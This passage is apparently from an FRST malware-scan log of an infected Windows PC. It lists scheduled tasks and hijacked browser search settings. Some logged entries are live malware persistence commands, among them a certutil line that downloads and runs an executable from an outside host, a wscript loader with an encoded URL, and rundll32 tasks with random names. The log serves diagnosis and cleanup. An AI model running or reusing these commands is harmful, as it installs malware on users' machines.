    Task: {4F1DE78F-0A8F-4CE3-938D-AC2B616AC190} - System32\Tasks\{7A857476-72D0-4F79-B46E-DDBB9367E33A} => E:\Games\League of Legends\LeagueClient.exe
    Task: {50A23EB5-B5AB-415B-91F9-EB82F18D26F2} - System32\Tasks\JSpPUlYEOjGQEpF2 => rundll32 "C:\Program Files (x86)\rZdaClXBU\dBJExn.dll",#1
    Task: {5554764B-4F14-40B3-988C-E8F6186CF607} - System32\Tasks\{70FDB57E-0921-404D-8CC7-ADDDC8F32EF0} => C:\Windows\system32\pcalua.exe -a "C:\Users\ADMIN\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe" -c /uninstall
    Task: {5C42DC6E-5254-4CFD-B2E7-FF9B7131A1FE} - System32\Tasks\{633E5C42-23C4-ABE8-66E1-2266DBE038D4} => C:\Users\ADMIN\AppData\Roaming\633e5c4223c4abe866e12266dbe038d4\Fahamutas.exe [622080 2013-04-15] () [File not signed]
    Task: {5E3E853A-A422-4F0A-8B19-A8AB5468C121} - System32\Tasks\Avast Software\Overseer => C:\Program Files\Common Files\Avast Software\Overseer\Overseer.exe [2281944 2019-06-04] (AVAST Software s.r.o. -> AVAST Software)
    Task: {5E7F7887-993A-417B-92FC-82E97B925178} - System32\Tasks\{CE00E3F7-606E-4CC5-98BE-BCBCB27B9EDC} => C:\Windows\system32\pcalua.exe -a C:\Users\ADMIN\AppData\Local\Roblox\Versions\version-418137ce542940cc\RobloxPlayerLauncher.exe -c -uninstall
    Task: {60BB3925-74CF-4F9F-A3D7-3290133AFE4E} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
    Task: {68AB5BC1-8480-41B1-A5D7-4D30C4B47665} - System32\Tasks\Opera scheduled Autoupdate 711520318 => C:\Users\ADMIN\AppData\Roaming\Microsoft\Windows\cuebedbh\atsfwaeb.exe
    Task: {8394AB45-EF1D-4E37-91A4-C8F05B75D6DF} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [1642672 2012-10-01] (Microsoft Corporation -> Microsoft Corporation)
    Task: {87335B70-CF14-4C5E-864F-21555C94C5FE} - System32\Tasks\lsa64 => C:\Users\ADMIN\AppData\Local\Temp\csrss\lsa64install_in.exe <==== ATTENTION
    Task: {8C64D776-FF35-4E90-97BA-6D5B1553A472} - System32\Tasks\AWWcazHJnUfLPA => rundll32 "C:\Program Files (x86)\WOFbcaOaHmAU2\ddZBKJvEZxUnO.dll",#1
    Task: {A6C28662-3195-4229-AE9A-97B6C0522DFA} - System32\Tasks\{1B912E17-A9FD-4CD6-A680-038D79B5F007} => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    Task: {A6E3971E-20D5-4BF5-A39D-17F461A85671} - System32\Tasks\{E41E9167-5C86-4994-8330-CCBE7DF1D074} => C:\Windows\system32\pcalua.exe -a C:\Users\ADMIN\AppData\Local\Roblox\Versions\version-3131b9dde23e4df9\RobloxPlayerLauncher.exe -c -uninstall
    Task: {AE552268-BF38-464C-86FC-3F22D097691C} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1195544 2018-12-16] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
    Task: {B11C4F0E-95C9-47A6-ACC8-60C53F6720C3} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: {B313EECC-46DA-4262-A954-87BF9E4B7307} - System32\Tasks\{3A3C505F-FC03-4620-BBE7-38EBDA099095} => F:\Super Smash Flash 2 Beta\SSF2.exe
    Task: {B377FEF3-420E-4825-A91F-00E92909C6EF} - System32\Tasks\{67B56D17-7F1F-A4E3-5640-5A99ED1D0072} => C:\Users\ADMIN\AppData\Roaming\Mefifi\Pumak.exe [1572454 2013-04-11] () [File not signed]
    Task: {B5DB98CD-7C51-4E3E-BB89-905B08A039F2} - System32\Tasks\Online Application V2G4 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: {B7648C78-359C-47AD-B703-FE0ABDEB20D8} - System32\Tasks\Yahoo! Powered rasin => C:\Windows\system32\wscript.exe "C:\ProgramData\{C7A902CA-4DEB-880C-CB2D-164E516F9D80}\daca" "68747470733a2f2f643277763764656e63316a78397a2e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "--IsErIk"
    Task: {B88369E2-7CB7-4586-BC03-2792BDFE3711} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [156968 2019-03-05] (Google Inc -> Google Inc.)
    Task: {BA036B6A-E3FB-446E-9C20-D5C649F72145} - System32\Tasks\{308D2D2D-ACA9-40A9-BC75-F3D6BEF07361} => C:\Users\ADMIN\Desktop\MCLeaksAuthenticator (3)\MCLeaksAuthenticator.exe
    Task: {BB26469E-2DB6-4ED7-ADC9-A9F97F2EA650} - System32\Tasks\{92049C58-6200-4261-9390-237D0B958AC5} => E:\Games\League of Legends\LeagueClient.exe
    Task: {C63C6C6E-54CE-4FFA-8039-DD354299B883} - System32\Tasks\Time Trigger Task => C:\Users\ADMIN\AppData\Local\dc987dec-8cfa-49ee-8d5d-aa82c048178f\421F.tmp.exe
    Task: {C64B27F0-57F2-4DCB-9AB5-045382600C92} - System32\Tasks\Online Application V2G5 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: {D1214DFC-EFAE-4770-A2D1-3BBCA082E2B3} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [375416 2012-10-01] (Microsoft Corporation -> Microsoft Corporation)
    Task: {D21ED491-0C14-4738-A5D5-1B0E1715A912} - System32\Tasks\{41FAE7E5-395A-1362-6827-28D01E0CDFE5}\sync => C:\Program Files (x86)\Common Files\Conuco\sync.exe [644608 2013-04-27] () [File not signed]
    Task: {D6B8833C-EB4D-4272-A09A-886417B49657} - System32\Tasks\Opera scheduled Autoupdate 1551278621 => C:\Users\ADMIN\AppData\Local\Programs\Opera\launcher.exe
    Task: {D99E7C60-2B55-4378-BD20-80EF4946069F} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe <==== ATTENTION
    Task: {E3BCCF2F-7E87-41AB-91CB-DE1669B8CA94} - System32\Tasks\txgYfgWClJeJBSoaCDR2 => rundll32 "C:\Program Files (x86)\BbdjrrKUeUXuC\IcaItHe.dll",#1
    Task: {EE2589EF-2101-4C28-B9C1-D1AD3D85A99F} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [375416 2012-10-01] (Microsoft Corporation -> Microsoft Corporation)
    Task: {EEC1D397-3475-4488-8723-AAC01A6F4884} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://foxmusic.xyz/app/app.exe C:\Users\ADMIN\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\ADMIN\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== ATTENTION
    Task: {F9AEF3CB-5875-43BC-AB23-BE5DD06B7D6B} - System32\Tasks\raSRPAMuIMRBbwMvC2 => rundll32 "C:\Program Files (x86)\woOqILJDRwqbnTOZbgR\zZLkSOi.dll",#1

    (If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

    Task: C:\Windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\Windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\Windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\Windows\Tasks\Online Application V2G4.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\Windows\Tasks\Online Application V2G5.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\Windows\Tasks\Online Application V2G6.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
    Task: C:\Windows\Tasks\update-S-1-5-21-3161437104-263828448-1275724104-1000.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
    Task: C:\Windows\Tasks\update-sys.job => C:\Program Files (x86)\Skillbrains\Updater\Updater.exe
    Task: C:\Windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
    Task: C:\Windows\Tasks\Yahoo! Powered rasin.job => Wscript exe
    Task: C:\Windows\Tasks\{633E5C42-23C4-ABE8-66E1-2266DBE038D4}.job => C:\Users\ADMIN\AppData\Roaming\633E5C~1\FAHAMU~1.EXE <==== ATTENTION
    Task: C:\Windows\Tasks\{67B56D17-7F1F-A4E3-5640-5A99ED1D0072}.job => C:\Users\ADMIN\AppData\Roaming\Mefifi\Pumak.exe

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.100.1
    Tcpip\..\Interfaces\{644D5D4C-C575-4567-B554-70E1BFCA99F2}: [NameServer] 82.163.143.146,82.163.142.148
    Tcpip\..\Interfaces\{644D5D4C-C575-4567-B554-70E1BFCA99F2}: [DhcpNameServer] 192.168.100.1

    Internet Explorer:
    ==================
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-e40236c692d65b6f
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.bing.com/search?FORM=INCOH1&PC=IC05&PTAG=ICO-e40236c692d65b6f
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14iNyhvwM8cNgCv0nNcgJUKiAGbbU139vtitIVxADHdMlFE1CBaLJ4mQ9SQGF57Wob-cABo6mYfOrXjmkNaKrCgsrJI5VLU&q={searchTerms}
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxps://in.yahoo.com/?fr=yset_ie_syc_oracle&type=orcl_hpset
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14uwks95rdBWH-p77UI3RI8987DLglboaxIzu7pyiEuqM_wd42dimnh3JBjZZrhlVqmsy5ItaCzx3PkdRB3hCbmY83RiDib
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14iNyhvwM8cNgCv0nNcgJUKiAGbbU139vtitIVxADHdMlFE1CBaLJ4mQ9SQGF57Wob-cABo6mYfOrXjmkNaKrCgsrJI5VLU&q={searchTerms}
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxps://in.yahoo.com/?fr=yset_ie_syc_oracle&type=orcl_hpset
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14uwks95rdBWH-p77UI3RI8987DLglboaxIzu7pyiEuqM_wd42dimnh3JBjZZrhlVqmsy5ItaCzx3PkdRB3hCbmY83RiDib
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14iNyhvwM8cNgCv0nNcgJUKiAGbbU139vtitIVxADHdMlFE1CBaLJ4mQ9SQGF57Wob-cABo6mYfOrXjmkNaKrCgsrJI5VLU&q={searchTerms}
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxps://in.yahoo.com/?fr=yset_ie_syc_oracle&type=orcl_hpset
    HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14uwks95rdBWH-p77UI3RI8987DLglboaxIzu7pyiEuqM_wd42dimnh3JBjZZrhlVqmsy5ItaCzx3PkdRB3hCbmY83RiDib
    HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161658923\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://searchinterneat-a.akamaihd.net/hm?eq=U0EeCFZVBB8SRggRIVgNBV1AEhgUcAhbTA1JRVQOIQ0KBxQXEwRBdA8OAFxHFAIFIk0FA1ADB0VXfVBdFElXTwh3MlBZD14dRGFRIVBU
    HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161703507\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://searchinterneat-a.akamaihd.net/hm?eq=U0EeCFZVBB8SRggRIVgNBV1AEhgUcAhbTA1JRVQOIQ0KBxQXEwRBdA8OAFxHFAIFIk0FA1ADB0VXfVBdFElXTwh3MlBZD14dRGFRIVBU
    SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e40236c692d65b6f&q={searchTerms}
    SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e40236c692d65b6f&q={searchTerms}
    SearchScopes: HKLM -> {26080cad-4adc-49ac-8c63-eda16e595cbd} URL = hxxps://in.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_nptdwxol_18_43_10&param1=1&param2=f%3D4%26b%3DIE%26cc%3Din%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0E0C0AzzyC0ByBtB0E0Dzz0F0FtDyEtCtN0D0Tzu0StByEzytBtN1L2XzuyEtFtByCtFtDtFtCyBtBtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StC0B0ByC0EyCzyyCtGtByD0A0CtGyB0FtCyBtGtD0BtA0DtG0EtCtAzzyBtBtC0E0C0AtC0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCtCtCtB1T1O1RyBtG1Q1O1TyCtGyEtCyB1TtGzytByEzytG1OyE1QyE1Rzy1S1Q1R1O1OyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCzyyDyByDtN1Q2Z1B1P1RzutCyDyEtDyBtBzztDyEyC%26cr%3D1292663095%26a%3Dwbf_nptdwxol_18_43_10%26os_ver%3D6.1%26os%3DWindows%2B7%2BUltimate&p={searchTerms}
    SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQtZAAwVRQQQbQ4IUFpcFQ1HIRRZVQsXDFMRcVsMVw8QRAMWdx9aFQQTSEcFME0FCFwEURNNfW1KCFgfRllGFEtZCFU=&q={searchTerms}
    SearchScopes: HKLM-x32 -> DefaultScope {ielnksrch} URL =
    SearchScopes: HKLM-x32 -> ielnksrch URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14iNyhvwM8cNgCv0nNcgJUKiAGbbU139vtitIVxADHdMlFE1CBaLJ4mQ9SQGF57Wob-cABo6mYfOrXjmkNaKrCgsrJI5VLU&q={searchTerms}
    SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e40236c692d65b6f&q={searchTerms}
    SearchScopes: HKLM-x32 -> {26080cad-4adc-49ac-8c63-eda16e595cbd} URL = hxxps://in.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_nptdwxol_18_43_10&param1=1&param2=f%3D4%26b%3DIE%26cc%3Din%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0E0C0AzzyC0ByBtB0E0Dzz0F0FtDyEtCtN0D0Tzu0StByEzytBtN1L2XzuyEtFtByCtFtDtFtCyBtBtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StC0B0ByC0EyCzyyCtGtByD0A0CtGyB0FtCyBtGtD0BtA0DtG0EtCtAzzyBtBtC0E0C0AtC0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCtCtCtB1T1O1RyBtG1Q1O1TyCtGyEtCyB1TtGzytByEzytG1OyE1QyE1Rzy1S1Q1R1O1OyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCzyyDyByDtN1Q2Z1B1P1RzutCyDyEtDyBtBzztDyEyC%26cr%3D1292663095%26a%3Dwbf_nptdwxol_18_43_10%26os_ver%3D6.1%26os%3DWindows%2B7%2BUltimate&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14iNyhvwM8cNgCv0nNcgJUKiAGbbU139vtitIVxADHdMlFE1CBaLJ4mQ9SQGF57Wob-cABo6mYfOrXjmkNaKrCgsrJI5VLU&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e40236c692d65b6f&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000 -> {26080cad-4adc-49ac-8c63-eda16e595cbd} URL = hxxps://in.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_nptdwxol_18_43_10&param1=1&param2=f%3D4%26b%3DIE%26cc%3Din%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0E0C0AzzyC0ByBtB0E0Dzz0F0FtDyEtCtN0D0Tzu0StByEzytBtN1L2XzuyEtFtByCtFtDtFtCyBtBtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StC0B0ByC0EyCzyyCtGtByD0A0CtGyB0FtCyBtGtD0BtA0DtG0EtCtAzzyBtBtC0E0C0AtC0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCtCtCtB1T1O1RyBtG1Q1O1TyCtGyEtCyB1TtGzytByEzytG1OyE1QyE1Rzy1S1Q1R1O1OyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCzyyDyByDtN1Q2Z1B1P1RzutCyDyEtDyBtBzztDyEyC%26cr%3D1292663095%26a%3Dwbf_nptdwxol_18_43_10%26os_ver%3D6.1%26os%3DWindows%2B7%2BUltimate&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14iNyhvwM8cNgCv0nNcgJUKiAGbbU139vtitIVxADHdMlFE1CBaLJ4mQ9SQGF57Wob-cABo6mYfOrXjmkNaKrCgsrJI5VLU&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14iNyhvwM8cNgCv0nNcgJUKiAGbbU139vtitIVxADHdMlFE1CBaLJ4mQ9SQGF57Wob-cABo6mYfOrXjmkNaKrCgsrJI5VLU&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e40236c692d65b6f&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023 -> {26080cad-4adc-49ac-8c63-eda16e595cbd} URL = hxxps://in.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_nptdwxol_18_43_10&param1=1&param2=f%3D4%26b%3DIE%26cc%3Din%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0E0C0AzzyC0ByBtB0E0Dzz0F0FtDyEtCtN0D0Tzu0StByEzytBtN1L2XzuyEtFtByCtFtDtFtCyBtBtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StC0B0ByC0EyCzyyCtGtByD0A0CtGyB0FtCyBtGtD0BtA0DtG0EtCtAzzyBtBtC0E0C0AtC0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCtCtCtB1T1O1RyBtG1Q1O1TyCtGyEtCyB1TtGzytByEzytG1OyE1QyE1Rzy1S1Q1R1O1OyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCzyyDyByDtN1Q2Z1B1P1RzutCyDyEtDyBtBzztDyEyC%26cr%3D1292663095%26a%3Dwbf_nptdwxol_18_43_10%26os_ver%3D6.1%26os%3DWindows%2B7%2BUltimate&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161655023 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14iNyhvwM8cNgCv0nNcgJUKiAGbbU139vtitIVxADHdMlFE1CBaLJ4mQ9SQGF57Wob-cABo6mYfOrXjmkNaKrCgsrJI5VLU&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413 -> DefaultScope {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14iNyhvwM8cNgCv0nNcgJUKiAGbbU139vtitIVxADHdMlFE1CBaLJ4mQ9SQGF57Wob-cABo6mYfOrXjmkNaKrCgsrJI5VLU&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://www.bing.com/search?FORM=INCOH2&PC=IC05&PTAG=ICO-e40236c692d65b6f&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413 -> {26080cad-4adc-49ac-8c63-eda16e595cbd} URL = hxxps://in.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_nptdwxol_18_43_10&param1=1&param2=f%3D4%26b%3DIE%26cc%3Din%26pa%3Dwincy%26cd%3D2XzuyEtN2Y1L1Qzu0E0C0AzzyC0ByBtB0E0Dzz0F0FtDyEtCtN0D0Tzu0StByEzytBtN1L2XzuyEtFtByCtFtDtFtCyBtBtN1L1CzutN1L1G1B1V1N2Y1L1Qzu2StC0B0ByC0EyCzyyCtGtByD0A0CtGyB0FtCyBtGtD0BtA0DtG0EtCtAzzyBtBtC0E0C0AtC0C2QtN1M1F1B2Z1V1N2Y1L1Qzu2StCtCtCtB1T1O1RyBtG1Q1O1TyCtGyEtCyB1TtGzytByEzytG1OyE1QyE1Rzy1S1Q1R1O1OyC2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCzyyDyByDtN1Q2Z1B1P1RzutCyDyEtDyBtBzztDyEyC%26cr%3D1292663095%26a%3Dwbf_nptdwxol_18_43_10%26os_ver%3D6.1%26os%3DWindows%2B7%2BUltimate&p={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1000-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161702413 -> {ielnksrch} URL = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRGNclVS1AC6sNoHCxomeujIo3zShD1-ctwyql0weKHh5feEcga2qczG8ei0cxT5EOl2TGGgb5drtf4DQEi4gHxvy9W14iNyhvwM8cNgCv0nNcgJUKiAGbbU139vtitIVxADHdMlFE1CBaLJ4mQ9SQGF57Wob-cABo6mYfOrXjmkNaKrCgsrJI5VLU&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161658923 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQtZAAwVRQQQbQ4IUFpcFQ1HIRRZVQsXDFMRcVsMVw8QRAMWdx9aFQQTSEcFME0FCFwEURNNfW1KCFgfRllGFEtZCFU=&q={searchTerms}
    SearchScopes: HKU\S-1-5-21-3161437104-263828448-1275724104-1003-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-07102019161658923 -> OldSearch URL = hxxp://searchinterneat-a.akamaihd.net/s?eq=U0EeE1xZE1oZB1ZEfQtZAAwVRQQQbQ4IUFpcFQ1HIRRZVQsXDFMRcVsMVw8QRAMWdx9aFQQTSEcFME0FCFwEURNNfW1KCFgfRllGFEtZCFU=&q={searchTerms}
